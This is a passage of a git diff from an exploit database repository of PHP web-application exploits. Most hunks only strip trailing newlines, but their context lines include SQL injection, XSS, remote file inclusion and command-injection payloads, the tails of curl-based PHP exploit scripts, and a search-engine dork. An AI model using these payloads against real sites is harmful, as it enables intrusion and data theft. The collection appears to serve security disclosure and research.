b/platforms/php/webapps/3909.txt index fb67063ae..78fac036e 100755 --- a/platforms/php/webapps/3909.txt +++ b/platforms/php/webapps/3909.txt @@ -12,4 +12,4 @@ #Miro_Tiger100[at]Hotmail[dot]com -# milw0rm.com [2007-05-12] +# milw0rm.com [2007-05-12] \ No newline at end of file diff --git a/platforms/php/webapps/39090.php b/platforms/php/webapps/39090.php index 29c073cf8..851fdce3b 100755 --- a/platforms/php/webapps/39090.php +++ b/platforms/php/webapps/39090.php @@ -50,4 +50,4 @@ $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/39093.txt b/platforms/php/webapps/39093.txt index 7ef2ddbe4..0b3038d94 100755 --- a/platforms/php/webapps/39093.txt +++ b/platforms/php/webapps/39093.txt @@ -24,4 +24,4 @@ http://localhost/beezfud/index.php?lookback=;echo ' +?> \ No newline at end of file diff --git a/platforms/php/webapps/39107.txt b/platforms/php/webapps/39107.txt index 322e21efc..47532d1f6 100755 --- a/platforms/php/webapps/39107.txt +++ b/platforms/php/webapps/39107.txt @@ -80,4 +80,4 @@ Host: www.example.com Content-Length: 946 site_name='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&home_url=http%3A%2F%2Fwww.atutorspaces.com&default_language=en&contact_email=admin%40here.com&time_zone=0&session_timeout=20&max_file_size=10485760&max_course_size=104857600&max_course_float=2097152&max_login=5&display_name_format=1&master_list=0&allow_registration=1&allow_browse=1&show_current=1&allow_instructor_registration=1&use_captcha=0&allow_unenroll=1&email_confirmation=0&allow_instructor_requests=1&disable_create=0&email_notification=1&auto_approve_instructors=0&theme_categories=0&user_notes=0&illegal_extentions=exe+asp+php+php3+bat+cgi+pl+com+vbs+reg+pcd+pif+scr+bas+inf+vb+vbe+wsc+wsf+wsh&cache_dir=&cache_life=7200&latex_server=http%3A%2F%2Fwww.atutor.ca%2Fcgi%2Fmimetex.cgi%3F&course_backups=5&sent_msgs_ttl=120&check_version=0&fs_versioning=1&old_enable_mail_queue=0&enable_mail_queue=0&auto_install_languages=0&pretty_url=0&course_dir_name=0&apache_mod_rewrite=0&submit=Save ------- +------ \ No newline at end of file diff --git a/platforms/php/webapps/3911.txt b/platforms/php/webapps/3911.txt index 386559f40..a5f8106b0 100755 --- a/platforms/php/webapps/3911.txt +++ b/platforms/php/webapps/3911.txt @@ -12,4 +12,4 @@ Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - Kin And All TURKISH HACKERS ! -# milw0rm.com [2007-05-14] +# milw0rm.com [2007-05-14] \ No newline at end of file diff --git a/platforms/php/webapps/39111.php b/platforms/php/webapps/39111.php index 9d95bd55b..77c91ab5b 100755 --- a/platforms/php/webapps/39111.php +++ b/platforms/php/webapps/39111.php @@ -16,4 +16,4 @@ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/39117.txt b/platforms/php/webapps/39117.txt index 344482fb1..328b55b66 100755 --- a/platforms/php/webapps/39117.txt +++ b/platforms/php/webapps/39117.txt @@ -43,4 +43,4 @@ File: admin/zone-delete.php POC: +width="1" height="1" border="0"> \ No newline at end of file diff --git a/platforms/php/webapps/39135.php b/platforms/php/webapps/39135.php index d1f20d7e9..fbfba350f 100755 --- a/platforms/php/webapps/39135.php +++ b/platforms/php/webapps/39135.php @@ -18,4 +18,4 @@ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/3915.txt b/platforms/php/webapps/3915.txt index 20eb125e0..016777915 100755 --- a/platforms/php/webapps/3915.txt +++ b/platforms/php/webapps/3915.txt @@ -33,4 +33,4 @@ Exploit :[Path]cep/lib/pcltrace.lib.php?g_pcltar_lib_dir=shell ############################################################## -# milw0rm.com [2007-05-13] +# milw0rm.com [2007-05-13] \ No newline at end of file diff --git a/platforms/php/webapps/39150.txt b/platforms/php/webapps/39150.txt index 6b66da95e..124bfb866 100755 --- a/platforms/php/webapps/39150.txt +++ b/platforms/php/webapps/39150.txt @@ -52,4 +52,4 @@ if(isset($_REQUEST["pc"]) AND $_REQUEST["pc"]!=""){ $_GET["pc"]=$_REQUEST["pc"]; $sql = "SELECT system_uuid, system_timestamp, system_name FROM system WHERE system_uuid = '$pc' OR system_name = '$pc' "; - $result = mysql_query($sql, $db); + $result = mysql_query($sql, $db); \ No newline at end of file diff --git a/platforms/php/webapps/39168.txt b/platforms/php/webapps/39168.txt index 3865b7319..c1a9a2f31 100755 --- a/platforms/php/webapps/39168.txt +++ b/platforms/php/webapps/39168.txt @@ -50,4 +50,4 @@ here the value of id will be id of victim, and value of rest of the post paramet 3. Persistent Cross site Scripting : In 'registeracc.php' and 'manage-profile.php' page the value of post parameter ' email ' supplied by user is not being ----------------------------------- validated .this leaves application vulnerable to persistent Cross Site Scripting. -# PoC : firstname=WICS&lastname=wics&email=&password=admin&ConfirmPassword=admin&update=Update+Profile +# PoC : firstname=WICS&lastname=wics&email=&password=admin&ConfirmPassword=admin&update=Update+Profile \ No newline at end of file diff --git a/platforms/php/webapps/39176.html b/platforms/php/webapps/39176.html index c3b99bb2e..560ba002d 100755 --- a/platforms/php/webapps/39176.html +++ b/platforms/php/webapps/39176.html @@ -21,4 +21,4 @@ TOA 2.5.6 is vulnerable; other versions may also be affected. - + \ No newline at end of file diff --git a/platforms/php/webapps/3918.txt b/platforms/php/webapps/3918.txt index c631c6a50..563ed977b 100755 --- a/platforms/php/webapps/3918.txt +++ b/platforms/php/webapps/3918.txt @@ -18,4 +18,4 @@ www.mohajem.org special tnx : fireman - dr.trojan-L0rd-Samir-s4rem-and all iranian hackers ************************************************************************************* -# milw0rm.com [2007-05-13] +# milw0rm.com [2007-05-13] \ No newline at end of file diff --git a/platforms/php/webapps/3919.txt b/platforms/php/webapps/3919.txt index 52ed6f094..7a8c0c37a 100755 --- a/platforms/php/webapps/3919.txt +++ b/platforms/php/webapps/3919.txt @@ -12,4 +12,4 @@ #Miro_Tiger100[at]Hotmail[dot]com -# milw0rm.com [2007-05-14] +# milw0rm.com [2007-05-14] \ No newline at end of file diff --git a/platforms/php/webapps/39190.php b/platforms/php/webapps/39190.php index f38190a8b..71f54fc5d 100755 --- a/platforms/php/webapps/39190.php +++ b/platforms/php/webapps/39190.php @@ -15,4 +15,4 @@ curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); print "$result"; -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/39198.html b/platforms/php/webapps/39198.html index 415d2dfad..0fcfd81d7 100755 --- a/platforms/php/webapps/39198.html +++ b/platforms/php/webapps/39198.html @@ -34,4 +34,4 @@ Enter CSRFTest user account password to continue... - + \ No newline at end of file diff --git a/platforms/php/webapps/3920.txt b/platforms/php/webapps/3920.txt index bb583d82d..824c30118 100755 --- a/platforms/php/webapps/3920.txt +++ b/platforms/php/webapps/3920.txt @@ -25,4 +25,4 @@ Exploit :[Path]/newsadmin.php?action=shell ############################################################## -# milw0rm.com [2007-05-14] +# milw0rm.com [2007-05-14] \ No newline at end of file diff --git a/platforms/php/webapps/39202.txt b/platforms/php/webapps/39202.txt index ef7953cc9..31d12596a 100755 --- a/platforms/php/webapps/39202.txt +++ b/platforms/php/webapps/39202.txt @@ -62,4 +62,4 @@ reported to vendor : 6/1/2016 vendor response : 6/1/2016 vendor acknowledged : 6/1/2016 vendor scheduled a patch: 7/1/2016 -CVE Number : Not assigned yet +CVE Number : Not assigned yet \ No newline at end of file diff --git a/platforms/php/webapps/39211.txt b/platforms/php/webapps/39211.txt index f0729986a..c655c340b 100755 --- a/platforms/php/webapps/39211.txt +++ b/platforms/php/webapps/39211.txt @@ -11,4 +11,4 @@ Download:
- + \ No newline at end of file diff --git a/platforms/php/webapps/39213.txt b/platforms/php/webapps/39213.txt index 67e7ea8b8..44dbd211b 100755 --- a/platforms/php/webapps/39213.txt +++ b/platforms/php/webapps/39213.txt @@ -10,4 +10,4 @@ Featured Comments 1.2.1 is vulnerable; other versions may also be affected. - + \ No newline at end of file diff --git a/platforms/php/webapps/3923.txt b/platforms/php/webapps/3923.txt index a1ee7ebf4..4f2c2eb89 100755 --- a/platforms/php/webapps/3923.txt +++ b/platforms/php/webapps/3923.txt @@ -12,4 +12,4 @@ #Miro_Tiger[at]Hotmail[dot]com -# milw0rm.com [2007-05-14] +# milw0rm.com [2007-05-14] \ No newline at end of file diff --git a/platforms/php/webapps/3924.txt b/platforms/php/webapps/3924.txt index 395ccfbca..264e2ff10 100755 --- a/platforms/php/webapps/3924.txt +++ b/platforms/php/webapps/3924.txt @@ -12,4 +12,4 @@ #Miro_Tiger100[at]Hotmail[com] -# milw0rm.com [2007-05-14] +# milw0rm.com [2007-05-14] \ No newline at end of file diff --git a/platforms/php/webapps/39246.txt b/platforms/php/webapps/39246.txt index 8b4733833..617a349d5 100755 --- a/platforms/php/webapps/39246.txt +++ b/platforms/php/webapps/39246.txt @@ -96,4 +96,4 @@ References: ----------------------------------------------------------------------------------------------- -Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. +Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \ No newline at end of file diff --git a/platforms/php/webapps/39249.txt b/platforms/php/webapps/39249.txt index c47fa70ea..4de0ffd09 100755 --- a/platforms/php/webapps/39249.txt +++ b/platforms/php/webapps/39249.txt @@ -65,4 +65,4 @@ http://www.example.com/WeBid/loader.php?js=js/jquery.js;js/jquery.lightbox.js; PoC http://www.example.com/WeBid/viewhelp.php?cat=[LDAP] -Replace cat= as 1,2,3,4 +Replace cat= as 1,2,3,4 \ No newline at end of file diff --git a/platforms/php/webapps/39254.html b/platforms/php/webapps/39254.html index 29ba82202..de51d6ee1 100755 --- a/platforms/php/webapps/39254.html +++ b/platforms/php/webapps/39254.html @@ -14,4 +14,4 @@ enctype="multipart/form-data">
- + \ No newline at end of file diff --git a/platforms/php/webapps/39255.html b/platforms/php/webapps/39255.html index f191b1847..79a8f7fe2 100755 --- a/platforms/php/webapps/39255.html +++ b/platforms/php/webapps/39255.html @@ -13,4 +13,4 @@ enctype="multipart/form-data"> - + \ No newline at end of file diff --git a/platforms/php/webapps/39261.txt b/platforms/php/webapps/39261.txt index 24a02c3ba..61c649dd7 100755 --- a/platforms/php/webapps/39261.txt +++ b/platforms/php/webapps/39261.txt @@ -177,4 +177,4 @@ The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. -by hyp3rlinx +by hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/39262.txt b/platforms/php/webapps/39262.txt index 9b29041c0..ee4dca605 100755 --- a/platforms/php/webapps/39262.txt +++ b/platforms/php/webapps/39262.txt @@ -136,4 +136,4 @@ The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. -by hyp3rlinx +by hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/39263.txt b/platforms/php/webapps/39263.txt index 14a5ec908..812f185a6 100755 --- a/platforms/php/webapps/39263.txt +++ b/platforms/php/webapps/39263.txt @@ -110,4 +110,4 @@ The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. -by hyp3rlinx +by hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/39267.html b/platforms/php/webapps/39267.html index 3b5ffeae8..28da2e0f2 100755 --- a/platforms/php/webapps/39267.html +++ b/platforms/php/webapps/39267.html @@ -17,4 +17,4 @@ E2 v2844 is vulnerable; other versions may also be affected. - + \ No newline at end of file diff --git a/platforms/php/webapps/39268.java b/platforms/php/webapps/39268.java index 40931c249..cabd43970 100755 --- a/platforms/php/webapps/39268.java +++ b/platforms/php/webapps/39268.java @@ -52,4 +52,4 @@ package { } } } -} +} \ No newline at end of file diff --git a/platforms/php/webapps/39270.txt b/platforms/php/webapps/39270.txt index 0392db361..33b96a5c2 100755 --- a/platforms/php/webapps/39270.txt +++ b/platforms/php/webapps/39270.txt @@ -27,5 +27,4 @@ Content-Type: application/x-www-form-urlencoded Content-Length: 843 CONTENIDO POST: -idx=1&whydowork_code=tets&whydowork_exclude=&whydowork_front_code_1=FALSE&whydowork_front_pos_1=top&whydowork_front_post_1=1&whydowork_front_code_2=FALSE&whydowork_front_pos_2=top&whydowork_front_post_2=1&whydowork_front_code_3=FALSE&whydowork_front_pos_3=top&whydowork_front_post_3=1&whydowork_page_code_1=FALSE&whydowork_page_pos_1=top&whydowork_page_code_2=FALSE&whydowork_page_pos_2=top&whydowork_page_code_3=FALSE&whydowork_page_pos_3=top&whydowork_single_code_1=FALSE&whydowork_single_pos_1=top&whydowork_single_code_2=FALSE&whydowork_single_pos_2=top&whydowork_single_code_3=FALSE&whydowork_single_pos_3=top&whydowork_singleold_code_1=FALSE&whydowork_singleold_pos_1=top&whydowork_singleold_code_2=FALSE&whydowork_singleold_pos_2=top&whydowork_singleold_code_3=FALSE&whydowork_singleold_pos_3=top&whydowork_adsense_oldday=&Submit=Update - +idx=1&whydowork_code=tets&whydowork_exclude=&whydowork_front_code_1=FALSE&whydowork_front_pos_1=top&whydowork_front_post_1=1&whydowork_front_code_2=FALSE&whydowork_front_pos_2=top&whydowork_front_post_2=1&whydowork_front_code_3=FALSE&whydowork_front_pos_3=top&whydowork_front_post_3=1&whydowork_page_code_1=FALSE&whydowork_page_pos_1=top&whydowork_page_code_2=FALSE&whydowork_page_pos_2=top&whydowork_page_code_3=FALSE&whydowork_page_pos_3=top&whydowork_single_code_1=FALSE&whydowork_single_pos_1=top&whydowork_single_code_2=FALSE&whydowork_single_pos_2=top&whydowork_single_code_3=FALSE&whydowork_single_pos_3=top&whydowork_singleold_code_1=FALSE&whydowork_singleold_pos_1=top&whydowork_singleold_code_2=FALSE&whydowork_singleold_pos_2=top&whydowork_singleold_code_3=FALSE&whydowork_singleold_pos_3=top&whydowork_adsense_oldday=&Submit=Update \ No newline at end of file diff --git a/platforms/php/webapps/3928.txt b/platforms/php/webapps/3928.txt index 2c89b0ba5..1676617fb 100755 --- a/platforms/php/webapps/3928.txt +++ b/platforms/php/webapps/3928.txt @@ -9,4 +9,4 @@ # Exploit http://site.com/[path]/index.php?config_atkroot=SHELL -# milw0rm.com [2007-05-15] +# milw0rm.com [2007-05-15] \ No newline at end of file diff --git a/platforms/php/webapps/39282.txt b/platforms/php/webapps/39282.txt index 3cc897b2a..2018d13cb 100755 --- a/platforms/php/webapps/39282.txt +++ b/platforms/php/webapps/39282.txt @@ -35,4 +35,4 @@ Parameter: selected_group Title: MySQL > 5.0.11 AND time-based blind Payload: action=gb_ajax_get_group&gb_nonce=5356513fbe&selected_group=2 AND SLEEP(5) Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) ---- +--- \ No newline at end of file diff --git a/platforms/php/webapps/39301.html b/platforms/php/webapps/39301.html index 54b1f0207..bcecd501c 100755 --- a/platforms/php/webapps/39301.html +++ b/platforms/php/webapps/39301.html @@ -12,4 +12,4 @@ form id:
action: - + \ No newline at end of file diff --git a/platforms/php/webapps/39302.html b/platforms/php/webapps/39302.html index c6f8cc01c..9a7720673 100755 --- a/platforms/php/webapps/39302.html +++ b/platforms/php/webapps/39302.html @@ -15,4 +15,4 @@ tweet schedule:
tweet post id:
- + \ No newline at end of file diff --git a/platforms/php/webapps/39309.txt b/platforms/php/webapps/39309.txt index 554bf3f95..1c2b44e9a 100755 --- a/platforms/php/webapps/39309.txt +++ b/platforms/php/webapps/39309.txt @@ -187,4 +187,4 @@ TIMELINE 2016-01-08 vulnerability discovered 2016-01-24 reported to vendor 2016-01-25 released appointment-booking-calendar 1.1.24 -2016-01-26 full disclosure +2016-01-26 full disclosure \ No newline at end of file diff --git a/platforms/php/webapps/3931.htm b/platforms/php/webapps/3931.htm index 8dbc743e7..7b37de6fc 100755 --- a/platforms/php/webapps/3931.htm +++ b/platforms/php/webapps/3931.htm @@ -287,4 +287,4 @@ return false; -# milw0rm.com [2007-05-15] +# milw0rm.com [2007-05-15] \ No newline at end of file diff --git a/platforms/php/webapps/39319.txt b/platforms/php/webapps/39319.txt index c29bcd687..43e16b6e6 100755 --- a/platforms/php/webapps/39319.txt +++ b/platforms/php/webapps/39319.txt @@ -74,4 +74,4 @@ TIMELINE 2016-01-08 vulnerability discovered 2016-01-24 reported to vendor 2016-01-25 released appointment-booking-calendar 1.1.24 -2016-01-26 full disclosure +2016-01-26 full disclosure \ No newline at end of file diff --git a/platforms/php/webapps/3932.pl b/platforms/php/webapps/3932.pl index 85a03c4f7..5214c3b60 100755 --- a/platforms/php/webapps/3932.pl +++ b/platforms/php/webapps/3932.pl @@ -86,4 +86,4 @@ exit(); } } -# milw0rm.com [2007-05-15] +# milw0rm.com [2007-05-15] \ No newline at end of file diff --git a/platforms/php/webapps/39320.txt b/platforms/php/webapps/39320.txt index 4ca78e77c..b540f52ad 100755 --- a/platforms/php/webapps/39320.txt +++ b/platforms/php/webapps/39320.txt @@ -43,6 +43,4 @@ back-end DBMS: MySQL 5.0.11 [21:14:21] [INFO] resumed: blackcat [21:14:21] [INFO] resumed: edusec -... - - +... \ No newline at end of file diff --git a/platforms/php/webapps/3933.pl b/platforms/php/webapps/3933.pl index 19b73a293..fdab02a96 100755 --- a/platforms/php/webapps/3933.pl +++ b/platforms/php/webapps/3933.pl @@ -86,4 +86,4 @@ exit(); } } -# milw0rm.com [2007-05-15] +# milw0rm.com [2007-05-15] \ No newline at end of file diff --git a/platforms/php/webapps/39333.html b/platforms/php/webapps/39333.html index a90db7b08..42210b801 100755 --- a/platforms/php/webapps/39333.html +++ b/platforms/php/webapps/39333.html @@ -11,4 +11,4 @@ Download:
- + \ No newline at end of file diff --git a/platforms/php/webapps/39339.txt b/platforms/php/webapps/39339.txt index 451080dfe..60a3b457f 100755 --- a/platforms/php/webapps/39339.txt +++ b/platforms/php/webapps/39339.txt @@ -95,4 +95,4 @@ vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information -or exploits by the author or elsewhere. +or exploits by the author or elsewhere. \ No newline at end of file diff --git a/platforms/php/webapps/39342.txt b/platforms/php/webapps/39342.txt index e3d94c8b1..47c2f0c5e 100755 --- a/platforms/php/webapps/39342.txt +++ b/platforms/php/webapps/39342.txt @@ -131,6 +131,4 @@ TIMELINE 2016-01-08 vulnerability discovered 2016-01-24 reported to vendor 2016-01-27 released plugin version 1.1.25 -2016-01-28 public disclousure - - +2016-01-28 public disclousure \ No newline at end of file diff --git a/platforms/php/webapps/39346.txt b/platforms/php/webapps/39346.txt index 108cdb709..06e7b16cc 100755 --- a/platforms/php/webapps/39346.txt +++ b/platforms/php/webapps/39346.txt @@ -36,4 +36,4 @@ entry_country_id=118[SQL INJECTION]=118' and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from -information_schema.tables group by x)a) and 1=1-- - +information_schema.tables group by x)a) and 1=1-- - \ No newline at end of file diff --git a/platforms/php/webapps/3935.txt b/platforms/php/webapps/3935.txt index c41b92986..1535fb6e3 100755 --- a/platforms/php/webapps/3935.txt +++ b/platforms/php/webapps/3935.txt @@ -16,4 +16,4 @@ include_once($sys['path_addon'].'/multilingual_vars.php'); [path]/custom_vars.php?sys[path_addon]=EvilC0de -# milw0rm.com [2007-05-16] +# milw0rm.com [2007-05-16] \ No newline at end of file diff --git a/platforms/php/webapps/39354.pl b/platforms/php/webapps/39354.pl index e4866deb1..3193b429f 100755 --- a/platforms/php/webapps/39354.pl +++ b/platforms/php/webapps/39354.pl @@ -93,4 +93,4 @@ print "MD5-Hash is: ".$1."\r\n"; } exit(); } -} +} \ No newline at end of file diff --git a/platforms/php/webapps/39355.txt b/platforms/php/webapps/39355.txt index 4bdebdf6c..845d9b3fe 100755 --- a/platforms/php/webapps/39355.txt +++ b/platforms/php/webapps/39355.txt @@ -30,4 +30,4 @@ In this case, the __construct is meaningless. ~~Everything revolves. Even the planet. :)~~ ***Greetz to ALL my followers on Twitter!*** -/bd0rk +/bd0rk \ No newline at end of file diff --git a/platforms/php/webapps/39384.txt b/platforms/php/webapps/39384.txt index ee7d3eebf..6d790c5b0 100755 --- a/platforms/php/webapps/39384.txt +++ b/platforms/php/webapps/39384.txt @@ -39,4 +39,4 @@ postorpage=page&post_parent=2&titles=TEST_CSRF&author_id=1&submitbutton=Add # Sajjad Sotoudeh , security , Kamran Helish , Dr.RooT , Milad Inj3ctor , Mr.Turk # # [+] fb.com/alirezapomis.blackhat -######################################################################## +######################################################################## \ No newline at end of file diff --git a/platforms/php/webapps/39404.txt b/platforms/php/webapps/39404.txt index 4e797684e..e9057e746 100755 --- a/platforms/php/webapps/39404.txt +++ b/platforms/php/webapps/39404.txt @@ -34,4 +34,4 @@ All of them are vulnerable to Union query and time-based blind. Vendor Notification 01/27/2016 to: the developers. They replied immediately and fixed the problem in a new release -002/03/2016: Disclosure +002/03/2016: Disclosure \ No newline at end of file diff --git a/platforms/php/webapps/3941.txt b/platforms/php/webapps/3941.txt index 222430e02..7cd4939a5 100755 --- a/platforms/php/webapps/3941.txt +++ b/platforms/php/webapps/3941.txt @@ -76,4 +76,4 @@ Script]] ############################################################################################## ############################################################################################## -# milw0rm.com [2007-05-16] +# milw0rm.com [2007-05-16] \ No newline at end of file diff --git a/platforms/php/webapps/39410.txt b/platforms/php/webapps/39410.txt index 1fca0c143..de33c82ec 100755 --- a/platforms/php/webapps/39410.txt +++ b/platforms/php/webapps/39410.txt @@ -39,4 +39,4 @@ Timeline Solution ================================================================================ -Update to version 3.4.7 +Update to version 3.4.7 \ No newline at end of file diff --git a/platforms/php/webapps/3942.pl b/platforms/php/webapps/3942.pl index 787510eab..b34fd3c40 100755 --- a/platforms/php/webapps/3942.pl +++ b/platforms/php/webapps/3942.pl @@ -74,4 +74,4 @@ print "------------------------------------------------------------------------- print "\nExploit Failed...\n"; } -# milw0rm.com [2007-05-16] +# milw0rm.com [2007-05-16] \ No newline at end of file diff --git a/platforms/php/webapps/39423.txt b/platforms/php/webapps/39423.txt index ec87f2154..c02b3e1cf 100755 --- a/platforms/php/webapps/39423.txt +++ b/platforms/php/webapps/39423.txt @@ -257,4 +257,4 @@ TIMELINE 2016-02-01 vulnerability discovered 2016-02-05 reported to vendor 2016-02-08 released fixed plugin v1.0.24 -2016-02-08 public disclosure +2016-02-08 public disclosure \ No newline at end of file diff --git a/platforms/php/webapps/3943.pl b/platforms/php/webapps/3943.pl index 4f3cdd699..f0344ef22 100755 --- a/platforms/php/webapps/3943.pl +++ b/platforms/php/webapps/3943.pl @@ -87,4 +87,4 @@ if($hash){ print "\nExploit Failed...\n"; } -# milw0rm.com [2007-05-16] +# milw0rm.com [2007-05-16] \ No newline at end of file diff --git a/platforms/php/webapps/39436.txt b/platforms/php/webapps/39436.txt index 1d1cee053..11795f6d6 100755 --- a/platforms/php/webapps/39436.txt +++ b/platforms/php/webapps/39436.txt @@ -181,4 +181,4 @@ Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult -EOF Pichaya Morimoto / @2015 +EOF Pichaya Morimoto / @2015 \ No newline at end of file diff --git a/platforms/php/webapps/3944.txt b/platforms/php/webapps/3944.txt index dec3fa8dc..5ab7dd9a4 100755 --- a/platforms/php/webapps/3944.txt +++ b/platforms/php/webapps/3944.txt @@ -19,4 +19,4 @@ google dork: inurl:index.php?option=com_yanc ------------------------------------------------------------- -# milw0rm.com [2007-05-17] +# milw0rm.com [2007-05-17] \ No newline at end of file diff --git a/platforms/php/webapps/39453.txt b/platforms/php/webapps/39453.txt index ff273d083..aad9ee25a 100755 --- a/platforms/php/webapps/39453.txt +++ b/platforms/php/webapps/39453.txt @@ -144,4 +144,4 @@ The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. -by hyp3rlinx +by hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/39459.txt b/platforms/php/webapps/39459.txt index e985e769a..3266f3d19 100755 --- a/platforms/php/webapps/39459.txt +++ b/platforms/php/webapps/39459.txt @@ -67,4 +67,4 @@ History 2016-01-29 Vendor contacted 2016-02-05 Vendor confirmed 2016-02-09 Vendor released patch -2016-02-16 Advisory released +2016-02-16 Advisory released \ No newline at end of file diff --git a/platforms/php/webapps/3946.txt b/platforms/php/webapps/3946.txt index c57ce5b35..db07b41a6 100755 --- a/platforms/php/webapps/3946.txt +++ b/platforms/php/webapps/3946.txt @@ -74,4 +74,4 @@ Romans 6:23 Romans 10:9 "That if you confess with your mouth, "Jesus is Lord," and believe in your heart that God raised him from the dead, you will be saved." -# milw0rm.com [2007-05-17] +# milw0rm.com [2007-05-17] \ No newline at end of file diff --git a/platforms/php/webapps/3947.txt b/platforms/php/webapps/3947.txt index 63e3190e2..d3beb89c3 100755 --- a/platforms/php/webapps/3947.txt +++ b/platforms/php/webapps/3947.txt @@ -21,4 +21,4 @@ # Greetz To: Sniper_Sa & Devil-X -# milw0rm.com [2007-05-17] +# milw0rm.com [2007-05-17] \ No newline at end of file diff --git a/platforms/php/webapps/39473.txt b/platforms/php/webapps/39473.txt index 171e58c97..4843831a5 100755 --- a/platforms/php/webapps/39473.txt +++ b/platforms/php/webapps/39473.txt @@ -130,6 +130,4 @@ is trademark of vulnerability-lab team & the specific authors or managers. To re -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com -CONTACT: research@vulnerability-lab.com - - +CONTACT: research@vulnerability-lab.com \ No newline at end of file diff --git a/platforms/php/webapps/39474.txt b/platforms/php/webapps/39474.txt index b19c21fe2..1cd07529b 100755 --- a/platforms/php/webapps/39474.txt +++ b/platforms/php/webapps/39474.txt @@ -188,6 +188,4 @@ is trademark of vulnerability-lab team & the specific authors or managers. To re -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com -CONTACT: research@vulnerability-lab.com - - +CONTACT: research@vulnerability-lab.com \ No newline at end of file diff --git a/platforms/php/webapps/3948.txt b/platforms/php/webapps/3948.txt index 92b3f9ab2..f61f89c6d 100755 --- a/platforms/php/webapps/3948.txt +++ b/platforms/php/webapps/3948.txt @@ -23,4 +23,4 @@ # ############################################################################################## -# milw0rm.com [2007-05-18] +# milw0rm.com [2007-05-18] \ No newline at end of file diff --git a/platforms/php/webapps/39489.py b/platforms/php/webapps/39489.py index b1398ea67..2dede8a98 100755 --- a/platforms/php/webapps/39489.py +++ b/platforms/php/webapps/39489.py @@ -110,4 +110,4 @@ his website 3. **2016-02-13**: Vendor responded and received details about this issue 4. **2016-02-15**: Vendor released v0.4.2.1 which resolves this issue -""" +""" \ No newline at end of file diff --git a/platforms/php/webapps/3949.txt b/platforms/php/webapps/3949.txt index 003bca50b..41fd4a00a 100755 --- a/platforms/php/webapps/3949.txt +++ b/platforms/php/webapps/3949.txt @@ -20,4 +20,4 @@ This Vulnerability takes place in pretty much every file in this webapp... Shouts: FiSh,sCuZz, sick, clorox, z3r0, katalyst, SyNiCaL, overdose, pr0be, Trintitty, rezen, str0ke and everyone else at g00ns.net that I forgot.. -# milw0rm.com [2007-05-18] +# milw0rm.com [2007-05-18] \ No newline at end of file diff --git a/platforms/php/webapps/39498.txt b/platforms/php/webapps/39498.txt index 41873879e..95976871d 100755 --- a/platforms/php/webapps/39498.txt +++ b/platforms/php/webapps/39498.txt @@ -29,4 +29,4 @@ http://[Site]/[Path]/oc-login.php =========== Thanks to =========== -All Indonesian Hacker!!! +All Indonesian Hacker!!! \ No newline at end of file diff --git a/platforms/php/webapps/39513.txt b/platforms/php/webapps/39513.txt index 0824f4e57..cd124d452 100755 --- a/platforms/php/webapps/39513.txt +++ b/platforms/php/webapps/39513.txt @@ -185,4 +185,4 @@ TIMELINE 2016-02-10 vulnerability discovered 2016-02-22 reported to vendor 2016-03-01 released cp polls v1.0.9 -2016-03-01 public disclousure +2016-03-01 public disclousure \ No newline at end of file diff --git a/platforms/php/webapps/39524.js b/platforms/php/webapps/39524.js index 702dc9957..bb19df301 100755 --- a/platforms/php/webapps/39524.js +++ b/platforms/php/webapps/39524.js @@ -135,4 +135,4 @@ function pwn(){ xhr.send(); } -pwn(); +pwn(); \ No newline at end of file diff --git a/platforms/php/webapps/39526.sh b/platforms/php/webapps/39526.sh index 5bd847da8..3e434d9a8 100755 --- a/platforms/php/webapps/39526.sh +++ b/platforms/php/webapps/39526.sh @@ -35,4 +35,4 @@ else echo echo "$hashes" fi -fi +fi \ No newline at end of file diff --git a/platforms/php/webapps/3953.txt b/platforms/php/webapps/3953.txt index b5f35edf7..be1f6e1bc 100755 --- a/platforms/php/webapps/3953.txt +++ b/platforms/php/webapps/3953.txt @@ -40,4 +40,4 @@ # ############################################################################################## -# milw0rm.com [2007-05-19] +# milw0rm.com [2007-05-19] \ No newline at end of file diff --git a/platforms/php/webapps/39547.txt b/platforms/php/webapps/39547.txt index c96fa5885..892d8d724 100755 --- a/platforms/php/webapps/39547.txt +++ b/platforms/php/webapps/39547.txt @@ -31,4 +31,4 @@ or they can send a form (no CSRF token check) -and it would execute XSS as long as they were logged in to the site. +and it would execute XSS as long as they were logged in to the site. \ No newline at end of file diff --git a/platforms/php/webapps/39548.txt b/platforms/php/webapps/39548.txt index 